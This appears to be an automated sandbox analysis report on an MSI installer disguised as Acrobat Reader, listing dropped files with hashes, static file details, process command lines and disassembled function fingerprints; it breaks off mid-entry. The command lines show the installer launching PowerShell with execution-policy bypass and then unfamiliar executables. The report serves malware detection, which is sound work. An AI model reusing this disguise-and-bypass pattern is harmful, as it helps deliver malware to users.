Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L....=.d.........."!...$.r..................................................0............@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{B95F3E55-F3A2-459E-ACB1-42A9918E3822}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1702092765651315
Encrypted:	false
SSDEEP:	12:JSbX72FjAHXiAGiLIlHVRpuBh/7777777777777777777777777vDHFAeOwm6txj:JPQI58/ROP6uF
MD5:	E770DF5B4DA11A558A53B5D687205D26
SHA1:	CD8937404ACB09B48BB00F296566171D3A6C36F4
SHA-256:	9AB5E7FD801BDE1FE6A6BD3C01899EA9D87849B19802AE9AEFF0EEA39014847B
SHA-512:	1991CE560A054093F679202D32AD57E65707773AD0E902D23BEA05390C9D93573204771A9F2C8E1B256B6AAA874A4C09A793CFB34F010258C7C90AAFBFED90E3
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.552757537572801
Encrypted:	false
SSDEEP:	48:18Ph8uRc06WXJijT5HIGmLLGvSCLLGRAECiCyjeoHLLGvSCLLGlTu8u:Yh81ZjTHEgLJECwgL2
MD5:	9B1780599D523988A881C394F8D9DBA2
SHA1:	4E613BE96FEF9096E5EFC00026C8DF772927D800
SHA-256:	88386E464C7D92A3D0D5FA9D22F966259AF7DC8FB5B943C3F91DDE3250AA4CB0
SHA-512:	D99252323924EECF4DF65BC8D890A74D294359875E078BAF91B98620591CB153F671D2F2A66EA7925EDA83CC52EE7BC5B05B918A8E284AB7F6C7A30D3014A2EC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	432221
Entropy (8bit):	5.375161872287833
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauX:zTtbmkExhMJCIpErS
MD5:	38D1E7BEC88B15D718F3D02163406309
SHA1:	04D3D5CB2D3669B4729911F23F5B2F6D18FBEEEF
SHA-256:	49E9DEF9604FA013068C671DC098C7D0ED0F85CDE5EE7828D8E8DF75361F837A
SHA-512:	5121331D45065675239EB2F50A4687AA10F0442ECA8E5B87E6B40FA844BBBA88641BBAC1CCDD4AB87E2451CD95C396136AB5CC7824E6DB8458C648F66D3FA985
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF041BD2223697B06A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.1335554604368003
Encrypted:	false
SSDEEP:	48:VuMxTeLLGvSCLLGOLLGvSCLLGRAECiCyjeoSFI:VCgLhgLJECp
MD5:	5F05A13C099069D6FE1F66983337E1B8
SHA1:	B4FACAA6C3EB108AD061C119B374296326D09B4F
SHA-256:	0ECF0D2DEB043E2B7E28613CAAB37364F5B8F1953D41C5F4445C21517D3CFA66
SHA-512:	E7F17CB39B59199AE7339C87B7A02F4D739B9BC456AA77717E46639A7DE231878B45D69E2EB22B01866D76DDB8D301B16D7991D6E648BE9CDD14C87469507ED4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF0557E58987E43906.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.552757537572801
Encrypted:	false
SSDEEP:	48:18Ph8uRc06WXJijT5HIGmLLGvSCLLGRAECiCyjeoHLLGvSCLLGlTu8u:Yh81ZjTHEgLJECwgL2
MD5:	9B1780599D523988A881C394F8D9DBA2
SHA1:	4E613BE96FEF9096E5EFC00026C8DF772927D800
SHA-256:	88386E464C7D92A3D0D5FA9D22F966259AF7DC8FB5B943C3F91DDE3250AA4CB0
SHA-512:	D99252323924EECF4DF65BC8D890A74D294359875E078BAF91B98620591CB153F671D2F2A66EA7925EDA83CC52EE7BC5B05B918A8E284AB7F6C7A30D3014A2EC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF27BEC705D68F963C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF369AAA9BD3E98772.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3F573BFDC36D15A5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF49F03DFBAC137679.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4A3CDC9B9A14D839.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.552757537572801
Encrypted:	false
SSDEEP:	48:18Ph8uRc06WXJijT5HIGmLLGvSCLLGRAECiCyjeoHLLGvSCLLGlTu8u:Yh81ZjTHEgLJECwgL2
MD5:	9B1780599D523988A881C394F8D9DBA2
SHA1:	4E613BE96FEF9096E5EFC00026C8DF772927D800
SHA-256:	88386E464C7D92A3D0D5FA9D22F966259AF7DC8FB5B943C3F91DDE3250AA4CB0
SHA-512:	D99252323924EECF4DF65BC8D890A74D294359875E078BAF91B98620591CB153F671D2F2A66EA7925EDA83CC52EE7BC5B05B918A8E284AB7F6C7A30D3014A2EC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF737B18E22A4DF28E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2457073323214463
Encrypted:	false
SSDEEP:	48:CL0ukWI+CFXJVT5vIGmLLGvSCLLGRAECiCyjeoHLLGvSCLLGlTu8u:A0xtTPEgLJECwgL2
MD5:	5DCEE087B9BCBFE92B80B20DCA089448
SHA1:	13D3FE99E8C1694E11105DF88BCE71D7B00B31C2
SHA-256:	B508D4B0EAB8CF91B610B4E4FB53A812647C71EC3DE905C60AE7DFAA5C13D0B4
SHA-512:	C19375D04BE6A89BF8887B938EBDD504BC16786B9D670B64AE328FDD012A8620F6D857016DA845BB332FF6133EA681F7AC4C7ED6C2113E85A7AC82B46AC83AE2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8ED4575D9A4FA77B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2457073323214463
Encrypted:	false
SSDEEP:	48:CL0ukWI+CFXJVT5vIGmLLGvSCLLGRAECiCyjeoHLLGvSCLLGlTu8u:A0xtTPEgLJECwgL2
MD5:	5DCEE087B9BCBFE92B80B20DCA089448
SHA1:	13D3FE99E8C1694E11105DF88BCE71D7B00B31C2
SHA-256:	B508D4B0EAB8CF91B610B4E4FB53A812647C71EC3DE905C60AE7DFAA5C13D0B4
SHA-512:	C19375D04BE6A89BF8887B938EBDD504BC16786B9D670B64AE328FDD012A8620F6D857016DA845BB332FF6133EA681F7AC4C7ED6C2113E85A7AC82B46AC83AE2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA7F1280A369BA172.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB8F6C9DBB8D4FDCE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07617298639552722
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOAe1cxoSimxR67RltyVky6lX:2F0i8n0itFzDHFAeOwm6txX
MD5:	24F64D68AE99541E3E8D30308330CAA1
SHA1:	5DA96134C0EA8E2773951D64C3E82957F946A5D0
SHA-256:	6092E5B6111304A021ADCDA82230B39F18169E18C6906559482AA2BDE088C56B
SHA-512:	EE3956DCDAE96D38FAA2E43134EE7AE6E78553AB5DE0508E11BC055CF4464B0F375157EDCBE4EE8EA2F4DCF8CC9E105F01C6806220FE73C8F2E796C189466134
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC157FE3DDB097816.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2457073323214463
Encrypted:	false
SSDEEP:	48:CL0ukWI+CFXJVT5vIGmLLGvSCLLGRAECiCyjeoHLLGvSCLLGlTu8u:A0xtTPEgLJECwgL2
MD5:	5DCEE087B9BCBFE92B80B20DCA089448
SHA1:	13D3FE99E8C1694E11105DF88BCE71D7B00B31C2
SHA-256:	B508D4B0EAB8CF91B610B4E4FB53A812647C71EC3DE905C60AE7DFAA5C13D0B4
SHA-512:	C19375D04BE6A89BF8887B938EBDD504BC16786B9D670B64AE328FDD012A8620F6D857016DA845BB332FF6133EA681F7AC4C7ED6C2113E85A7AC82B46AC83AE2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466064995777406
Encrypted:	false
SSDEEP:	6144:CIXfpi67eLPU9skLmb0b4WWSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbO:nXD94WWlLZMM6YFHU+O
MD5:	F2639BAAD65A6A27A7189F61E342FE3B
SHA1:	7664FC1649FC8CA0D64E9D4FC0B9176F84704A83
SHA-256:	3F7F3406B6BF1480C6ECF6E31754F96D5980FEF38731A82EC8610D407D001E98
SHA-512:	C1C65D40A37530EFF12F5D4ECEE0D0ED7CF83B6D3640B64696A2CDF77E0476E297CC50510C2BCE9D0ABE98D753DA850186872D313AC53B279AB5AC1CC220FCF0
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................p...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9533E8F2-DB9B-40B9-A160-5A93E74B5068}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Jun 5 18:11:30 2024, Number of Pages: 200
Entropy (8bit):	7.75653870281256
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	ust_019821730-0576383.msi
File size:	5'776'896 bytes
MD5:	282d913070c0ea94546fc870d5760694
SHA1:	303885df9e9ad7411755fbf4affee6c7486967a2
SHA256:	c8445a8f19cb350c35894d209654041308c50bdeac5d8b1541361ef69b29e284
SHA512:	1cfb5280035994f7e83f5a2f8e140756b373961e7950f00e27bb1b9be83ed002691b7382cc49f39c517243a3e15825d8a3677dab751c20c29bfdc06723ce8662
SSDEEP:	98304:0+X/n/8/ZUc1AH4K3YWNyDxsgeNC1u3395sO3adRQB8X:V/iUWAYsNyDxgC1u34ldRQI
TLSH:	8F460122B287C537D56D01B2E468EE5E153DBE730B3144E7B7E8396E88B08C1A375B46
File Content Preview:	........................>...................Y...................................F.......b.......t.......................................s...............................................~......................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Target ID:	0
Start time:	05:01:04
Start date:	10/06/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ust_019821730-0576383.msi"
Imagebase:	0x7ff6b86c0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:01:04
Start date:	10/06/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6b86c0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	05:01:05
Start date:	10/06/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420
Imagebase:	0xc40000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:01:06
Start date:	10/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Imagebase:	0xb80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:01:06
Start date:	10/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:01:15
Start date:	10/06/2024
Path:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"
Imagebase:	0x7ff625a10000
File size:	55'808 bytes
MD5 hash:	53AB9B8198E8AD8D3A043F40E72B1AB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:01:20
Start date:	10/06/2024
Path:	C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
Imagebase:	0x7ff645680000
File size:	2'790'176 bytes
MD5 hash:	1913EFB2223B24D2A47FAD0A1AAD8F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:02:47
Start date:	10/06/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7916 -s 580
Imagebase:	0x7ff7ddf80000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 07170F98 Relevance: 7.7, Strings: 6, Instructions: 223COMMON

Download Yara Rule

Strings

$^q, xrefs: 0717107B
$^q, xrefs: 071710E6
$^q, xrefs: 071710D6
$^q, xrefs: 07171100
$^q, xrefs: 0717105A
$^q, xrefs: 07171110

Memory Dump Source

Source File: 00000003.00000002.1814781199.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7170000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 3366dbba58df20f43627b3259994c35309a999f40ca92bc7d26ff129f310561b
Instruction ID: fb9578ad6afd158ef5509300e0fb568748d2ae6fa1ea8307b3a575eb20d4bf7a
Opcode Fuzzy Hash: 3366dbba58df20f43627b3259994c35309a999f40ca92bc7d26ff129f310561b
Instruction Fuzzy Hash: CD7104B070424DAFCB199F38C805BAA7BB6AF85311F10846AE905CF2D2CF35D984D7A1

Function 07170F78 Relevance: 5.1, Strings: 4, Instructions: 134COMMON

Download Yara Rule

Strings

$^q, xrefs: 0717107B
$^q, xrefs: 071710D6
$^q, xrefs: 07171100
$^q, xrefs: 0717105A

Memory Dump Source

Source File: 00000003.00000002.1814781199.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7170000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0354630a879b44f5bacef346d80c746e178d5442c25987e63a08a2e11473651f
Instruction ID: ed8fcc15ef5749eefb6d6f8d34c137b334b162b1dd3e77cf9635b0bc4f810863
Opcode Fuzzy Hash: 0354630a879b44f5bacef346d80c746e178d5442c25987e63a08a2e11473651f
Instruction Fuzzy Hash: 514106F061438EEFDB2A8E34C4457BA7BB5AB82351F158066E804CF1D2C739D984DB61

Function 00B6A820 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

(Xcq, xrefs: 00B6A9AF
LR^q, xrefs: 00B6A8CD

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 34b0fee33c5463f9be1ec335a90bbc34993b8230d6d89a1247c3e8f014218bdf
Instruction ID: ba7e14271028f81f5815e2f9380e672440a0cf61c5d78bb4c08f7627f5f40a32
Opcode Fuzzy Hash: 34b0fee33c5463f9be1ec335a90bbc34993b8230d6d89a1247c3e8f014218bdf
Instruction Fuzzy Hash: 0E523C34B00218CFDB14DB64C895BADB7B2BF85304F1180D9E949AB395DB39AD85CF92

Function 00B6A630 Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

(Xcq, xrefs: 00B6A9AF
LR^q, xrefs: 00B6A8CD

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 696d3fd15a4e296a9d3899b7d9d83a0133dffd32668e77ebc24f01f6588cbfc0
Instruction ID: 17e99b1f65a77e21c5f5055f1d5dea885bcbed4033c5d92884ec6a78b55e4117
Opcode Fuzzy Hash: 696d3fd15a4e296a9d3899b7d9d83a0133dffd32668e77ebc24f01f6588cbfc0
Instruction Fuzzy Hash: 5A514934A003188FDB14CB68C850BADBBF6FF89304F1141A9E949AB395DB75AD45CF92

Function 00B68478 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00ce4b8d92264642721e08225b61b92c6dd60a5b302b948add7ba3306dc4e83
Instruction ID: 54a8ccc14dd6e21957a24abb3652a4f26965d23a52c1eb579acd0808432f0038
Opcode Fuzzy Hash: a00ce4b8d92264642721e08225b61b92c6dd60a5b302b948add7ba3306dc4e83
Instruction Fuzzy Hash: 9BA16235A002489FDB14DFA4D584AADBBF6FF84310F218659E406AF365DF78AD49CB80

Function 00B6A120 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968742d6354e3f0107ad507d3303836bb2bae8a9baacf8c59938a048948b1aa5
Instruction ID: a83f23e96027fc6be7417f8517f9531a7e0c288a07c6ebfb98c91496347fcacb
Opcode Fuzzy Hash: 968742d6354e3f0107ad507d3303836bb2bae8a9baacf8c59938a048948b1aa5
Instruction Fuzzy Hash: 06A18F34A052489FCB15DFA8D8949ADBBF2FF8A300F1584A9E445AB362C739EC45CF51

Function 00B68BC8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977e1193bbede868572e92bc12b2a5e594e7cb847429c49f3608137aa14dc0a6
Instruction ID: 6ff0b73c9905ef58a53baee3af846fa2d529cfeec89149a11ca6a28c7dd5b1a4
Opcode Fuzzy Hash: 977e1193bbede868572e92bc12b2a5e594e7cb847429c49f3608137aa14dc0a6
Instruction Fuzzy Hash: FD71D230A00249CFCB14DF68D884A9EBBF6FF85314F1486A9E415DB6A1DB79EC45CB90

Function 00B68D36 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d713eb72deed618ae2ade475e0e917cf1094db38d2c06387ed4180e573e84a3e
Instruction ID: ab45f6052d2af4bf17b281621e9db4e7a045c2c3287685553eb11c628d63f251
Opcode Fuzzy Hash: d713eb72deed618ae2ade475e0e917cf1094db38d2c06387ed4180e573e84a3e
Instruction Fuzzy Hash: 67714C30A002089FDB14DFB4D894BADBBF2FF84344F148569D416AB2A4DF79AC46CB51

Function 00B68959 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da7b78496e46d1d85d42d3485c7bd05798bb1340b2e9d982b7f5d341f2b919f
